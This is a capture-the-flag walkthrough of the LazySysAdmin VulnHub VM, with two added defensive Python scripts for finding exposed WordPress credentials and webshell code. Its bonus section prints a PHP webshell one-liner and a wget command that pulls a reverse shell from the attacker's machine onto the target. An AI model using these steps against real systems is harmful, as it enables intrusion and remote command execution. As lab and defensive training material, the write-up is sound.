Here is my solution to the LazySysAdmin Vulnhub VM.
As usual, start by getting the IP of the VM.
A quick Nmap scan reveals what ports and services we can focus our efforts on. We find ports 22, 80, 139, 445, 3306 & 6667 open. There is also a robots.txt which exposes a few directories we can explore.
I began my search with investigations into SMB. I ran the smb-enum-shares.nse script with Nmap to see if we could find any goodies.
Looks like potentially read/write access to /var/www/html? Looking into this further, I didn't have anonymous write access, but we could read a great deal in the /var/www/html folder!
There were a few goodies here, a few of which are summarised below.
- deets.txt – Password = 12345 (can possibly use this later if we find a username)
- wordpress/wp-config.php – MySQL credentials Admin:TogieMYSQL12345^^
There was no write access available here, so if we're going to pop a reverse shell it might just require a little more effort.
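The readable wp-config.php is the finding a defender most needs to catch before a share like this is ever exposed. The following is an added example, not code from the original write-up: it walks a directory tree (a constructed sample web root built in a temp directory, with placeholder credentials), reports WordPress config files whose DB_* defines are readable by "other" (which is what an anonymous SMB or HTTP reader sees), and tightens the file mode. The file names, credentials and helper names are my own assumptions.

```python
"""Find WordPress config files that leak database credentials to anyone
who can read the share, and tighten their permissions.

Added example, not part of the original write-up. The sample tree is
constructed in a temp directory; its file names and credential values are
invented placeholders."""
import os
import re
import stat
import tempfile

# Matches lines such as: define('DB_USER', 'value');
DEFINE_RE = re.compile(
    r"""define\(\s*['"](DB_(?:NAME|USER|PASSWORD|HOST))['"]\s*,\s*['"]([^'"]*)['"]\s*\)"""
)
# Backup copies and editor leftovers are just as readable as the live file.
CONFIG_NAMES = {"wp-config.php", "wp-config.php.bak", "wp-config.php~"}


def world_readable(path):
    """True if the mode grants read to 'other', i.e. what an anonymous reader gets."""
    return bool(os.stat(path).st_mode & stat.S_IROTH)


def find_exposed_configs(root):
    """Walk root and return [(relative path, {constant: value}, world_readable)]
    for every config file that defines DB credentials. Paths use '/'."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name not in CONFIG_NAMES:
                continue
            full = os.path.join(dirpath, name)
            with open(full, encoding="utf-8", errors="replace") as fh:
                creds = dict(DEFINE_RE.findall(fh.read()))
            if creds:
                rel = os.path.relpath(full, root).replace(os.sep, "/")
                findings.append((rel, creds, world_readable(full)))
    return findings


def harden(root, rel):
    """Drop read access for 'other' (owner rw, web-server group r).
    Returns True when the file is no longer world readable."""
    full = os.path.join(root, *rel.split("/"))
    os.chmod(full, 0o640)
    return not world_readable(full)


def build_sample_share():
    """Construct a throwaway tree mimicking an exposed web root; returns its path."""
    root = tempfile.mkdtemp(prefix="share_")
    wp = os.path.join(root, "wordpress")
    os.makedirs(wp)
    cfg = os.path.join(wp, "wp-config.php")
    with open(cfg, "w", encoding="utf-8") as fh:
        fh.write("<?php\n"
                 "define('DB_NAME', 'wordpress');\n"
                 "define('DB_USER', 'Admin');\n"
                 "define('DB_PASSWORD', 'example-password');\n"  # constructed value
                 "define('DB_HOST', 'localhost');\n")
    os.chmod(cfg, 0o644)  # the weak setting: readable by everyone on the share
    with open(os.path.join(root, "index.html"), "w", encoding="utf-8") as fh:
        fh.write("<html></html>\n")
    return root


if __name__ == "__main__":
    share = build_sample_share()
    for rel, creds, exposed in find_exposed_configs(share):
        print(rel, "user=%s" % creds.get("DB_USER"), "world-readable=%s" % exposed)
        if exposed:
            print("  hardened:", harden(share, rel))
```

The mode check is deliberately about the "other" bit rather than the share definition: a Samba share with guest access hands out exactly the permissions the filesystem gives to everyone, so that bit is what decides whether an anonymous client can read the credentials.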
Investigations turned to the web (80) service next.
First I ran 'dirb' to try and find any other web directories that weren't specifically mentioned in the robots.txt file. (dirb http://10.1.0.4 /usr/share/wordlists/dirb/common.txt)
We find some interesting directories, as below.
Visiting the /phpmyadmin directory, I find that the creds obtained from the wp-config.php file work to log in, but don't seem to provide access to anything.
Bummer. Time to go deeper. Looking at the WordPress install, we appear to be able to log in with the previously obtained MySQL credentials.
Investigating the Admin user we find his name is “Togie”. This is also smeared all over their first “Hello world” post. Maybe Togie is our lazysysadmin. Trying the previously obtained password “12345”, we are able to log in as this user through SSH.
Awesome, that was easy!
FOR BONUS POINTS
If this didn't work I was going to inject a basic webshell into a .php page using the WordPress editor (<?php echo system($_GET['cmd']); ?>)…
And then use that page to pull down a reverse shell from my Kali machine, (wget http://10.1.0.5/shell.txt; mv shell.txt shell.php; ls -lah) to confirm it was uploaded…
And then execute that through the browser. I tried this and it did also work, so there is an extra way of getting in (low priv as www-data).
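The one-liner above is also exactly the pattern a defender can hunt for in a WordPress tree, and the editor it relies on can be switched off. Below is an added example, not code from the original post: it scans PHP sources for command-execution calls whose arguments come straight from a request superglobal, and checks whether wp-config.php sets DISALLOW_FILE_EDIT (a real WordPress constant that removes the dashboard theme/plugin editor). The sample files are constructed in-memory strings and the helper names are my own.

```python
"""Detect webshell-style PHP (an exec function fed from request input) and
check whether the WordPress file editor is disabled.

Added example, not from the original post; SAMPLE_FILES is constructed."""
import re

# Exec-style PHP functions and the request superglobals an attacker controls.
EXEC_CALL_RE = re.compile(r"\b(system|exec|shell_exec|passthru|popen|proc_open)\s*\(")
REQUEST_INPUT_RE = re.compile(r"\$_(?:GET|POST|REQUEST|COOKIE)\b")
DISALLOW_EDIT_RE = re.compile(
    r"define\(\s*['\"]DISALLOW_FILE_EDIT['\"]\s*,\s*true\s*\)", re.IGNORECASE
)


def find_webshell_calls(src):
    """Return [(line_no, function, argument text)] for exec-style calls whose
    argument list references request input. Parentheses are balanced so that
    nested calls such as system(trim($_GET['x'])) are still caught."""
    hits = []
    for m in EXEC_CALL_RE.finditer(src):
        depth, i = 1, m.end()
        while i < len(src) and depth:
            depth += {"(": 1, ")": -1}.get(src[i], 0)
            i += 1
        args = src[m.end():i - 1]
        if REQUEST_INPUT_RE.search(args):
            line = src.count("\n", 0, m.start()) + 1
            hits.append((line, m.group(1), args.strip()))
    return hits


def scan(files):
    """files: {relative path: source}. Returns only the PHP files with hits."""
    report = {}
    for path, src in files.items():
        if path.endswith(".php"):
            hits = find_webshell_calls(src)
            if hits:
                report[path] = hits
    return report


def file_editing_disabled(wp_config_src):
    """True if wp-config.php turns the dashboard theme/plugin editor off."""
    return DISALLOW_EDIT_RE.search(wp_config_src) is not None


# Constructed sample tree: one injected template, one benign exec, one config.
SAMPLE_FILES = {
    "wp-content/themes/example/404.php":
        "<?php\necho 'not found';\necho system($_GET['cmd']);\n",
    "wp-content/plugins/example/admin.php":
        "<?php\nfunction report() {\n    return passthru(trim($_POST['c']));\n}\n",
    "wp-includes/maintenance.php":
        "<?php\n$out = shell_exec('df -h');\necho htmlspecialchars($out);\n",
    "wp-config.php":
        "<?php\ndefine('DB_NAME', 'wordpress');\n",
}

# The corrected setting beside the weak one above (constructed).
HARDENED_WP_CONFIG = (
    "<?php\ndefine('DB_NAME', 'wordpress');\n"
    "define('DISALLOW_FILE_EDIT', true);\n"
)


if __name__ == "__main__":
    for path, hits in scan(SAMPLE_FILES).items():
        for line, func, args in hits:
            print("%s:%d %s(%s)" % (path, line, func, args))
    print("editor disabled:", file_editing_disabled(SAMPLE_FILES["wp-config.php"]))
```

Disabling the editor closes the injection path used above but not a stolen admin session's ability to upload a plugin; pairing the config flag with a periodic scan of wp-content for these call patterns covers both, and any hit in a theme or plugin that did not ship with that code is worth an incident ticket rather than a quiet cleanup.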
But, back on topic: SSH access as togie! Once logged in as togie, we check if we can run anything good with a “sudo --list”, and yep, we can!
Total time spent: Approx 1.5 hours
This was a fun and pretty simple one to knock over. Thanks for the challenge Togie Mcdogie 🙂